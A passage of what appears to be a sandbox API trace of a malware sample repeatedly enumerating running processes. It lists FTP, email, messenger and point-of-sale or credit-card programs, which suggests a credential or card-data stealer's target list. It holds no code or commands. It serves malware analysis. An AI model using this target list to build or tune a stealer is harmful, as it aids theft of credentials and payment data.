th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0177.504] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.505] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.507] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.509] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0177.511] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0177.513] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0177.515] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0177.547] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0177.549] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0177.551] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0177.553] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0177.555] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0177.557] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0177.559] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0177.561] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0177.563] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0177.565] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0177.566] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0177.568] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0177.570] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0177.573] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0177.575] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0177.578] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0177.580] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0177.586] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0177.589] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0177.591] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0177.594] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0177.596] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0177.599] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0177.601] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0177.605] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0177.608] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0177.610] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0177.613] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0177.615] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0177.617] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0177.619] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0177.621] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0177.627] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0177.629] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0177.631] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0177.634] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0177.637] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0177.639] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0177.641] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0177.644] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0177.646] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0177.649] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0177.651] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0177.654] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0177.656] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0177.659] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0177.664] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0177.667] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0177.669] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0177.671] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0177.673] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0177.675] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0177.677] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0177.680] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0177.682] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0177.686] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0177.688] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0177.691] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0177.695] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0177.698] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0177.700] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0177.705] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0177.708] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0177.710] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.714] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0177.717] CloseHandle (hObject=0x1970) returned 1 [0177.717] Sleep (dwMilliseconds=0x64) [0177.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb3c [0177.854] Process32First (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.856] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.858] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.859] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.862] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.863] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.865] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.867] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.868] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.870] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.875] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.878] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, 